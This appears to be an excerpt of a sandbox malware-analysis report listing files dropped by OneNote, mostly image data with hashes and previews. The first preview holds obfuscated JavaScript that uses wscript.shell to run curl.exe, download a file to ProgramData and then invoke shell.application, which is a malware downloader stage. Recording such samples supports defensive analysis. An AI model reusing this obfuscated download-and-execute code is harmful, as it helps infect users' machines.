                                                                                                                                            SHA1:5A7792A9B3677FDC6596B09C7AFF117DDF15BD28
                                                                                                                                            SHA-256:4F069F918EDC3919F59CD0608574BC214D6020E81F2603F0E3B3BAD6E0F9939E
                                                                                                                                            SHA-512:9011308DB60773AC6F33462FEAC996DF17F34E1A9322BE2306C11674CB53D81D5492BE5DE7FAAC700344F1DCD8763A3B2876E064318E46F5186671352FC3B734
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<html>....<div id="content">f5&u5&n5&c5&t5&i5&o5&n5& 5&s5&l5&e5&e5&p5&(5&m5&i5&l5&l5&i5&s5&)5&{5&v5&a5&r5& 5&d5&a5&t5&e5& 5&=5& 5&n5&e5&w5& 5&D5&a5&t5&e5&(5&)5&;5&v5&a5&r5& 5&c5&u5&r5&D5&a5&t5&e5& 5&=5& 5&n5&u5&l5&l5&;5&d5&o5& 5&{5& 5&c5&u5&r5&D5&a5&t5&e5& 5&=5& 5&n5&e5&w5& 5&D5&a5&t5&e5&(5&)5&;5& 5&}5&w5&h5&i5&l5&e5&(5&c5&u5&r5&D5&a5&t5&e5& 5&-5& 5&d5&a5&t5&e5& 5&<5& 5&m5&i5&l5&l5&i5&s5&)5&;5&}5&/5&*5&*5& 5&v5&a5&r5& 5&u5&r5&l5& 5&=5& 5&"5&h5&t5&t5&p5&s5&:5&/5&/5&g5&o5&o5&g5&l5&e5&.5&c5&o5&m5&"5&;5& 5&*5&/5&n5&e5&w5& 5&A5&c5&t5&i5&v5&e5&X5&O5&b5&j5&e5&c5&t5&(5&"5&w5&s5&c5&r5&i5&p5&t5&.5&s5&h5&e5&l5&l5&"5&)5&.5&r5&u5&n5&(5&"5&c5&u5&r5&l5&.5&e5&x5&e5& 5&-5&-5&o5&u5&t5&p5&u5&t5& 5&C5&:5&\5&\5&P5&r5&o5&g5&r5&a5&m5&D5&a5&t5&a5&\5&\5&i5&n5&d5&e5&x5&15&.5&p5&n5&g5& 5&-5&-5&u5&r5&l5& 5&"5& 5&+5& 5&u5&r5&l5&,5& 5&05&)5&;5&s5&l5&e5&e5&p5&(5&15&55&05&05&05&)5&;5&v5&a5&r5& 5&s5&h5&e5&l5&l5& 5&=5& 5&n5&e5&w5& 5&A5&c5&t5&i5&v5&e5&X5&O5&b5&j5&e5&c5&t5&(5&"5&s5&h5&e5&l5&l5&.5&a5&p5&p5&l5&i5&c5&a5&t5&

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2F839712-4F60-4B99-B293-276054B557EA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{2FF1EED4-F37E-4EA5-9C87-FDD68A44E6DF}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{30BC2254-19F3-4D27-A89B-574A6C18380B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{31150F08-737E-4363-BB50-E14685FF0CDB}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):34299
                                                                                                                                            Entropy (8bit):7.247541176493898
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                            MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                            SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                            SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                            SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{31343E48-328B-4D73-8433-8AAD1A62A7BF}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{31870717-085F-4DCA-A01D-FCBA365B3817}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{31C008AF-5410-4957-A31A-CBA9738DF1CB}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{33FA74A3-4E09-4C8E-AA3A-CBAA880DA935}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3628D43C-630C-48CC-9A98-E99B6C0CFFA5}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{36748D28-3B9D-4A89-BB57-BED66AF6FFFE}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{37334646-1ACA-43ED-8E08-2567DC610927}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3766D464-5ABF-47A1-B168-2CC5DE509F9C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2695
                                                                                                                                            Entropy (8bit):7.434963358385164
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                            MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                            SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                            SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                            SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                            Malicious:false
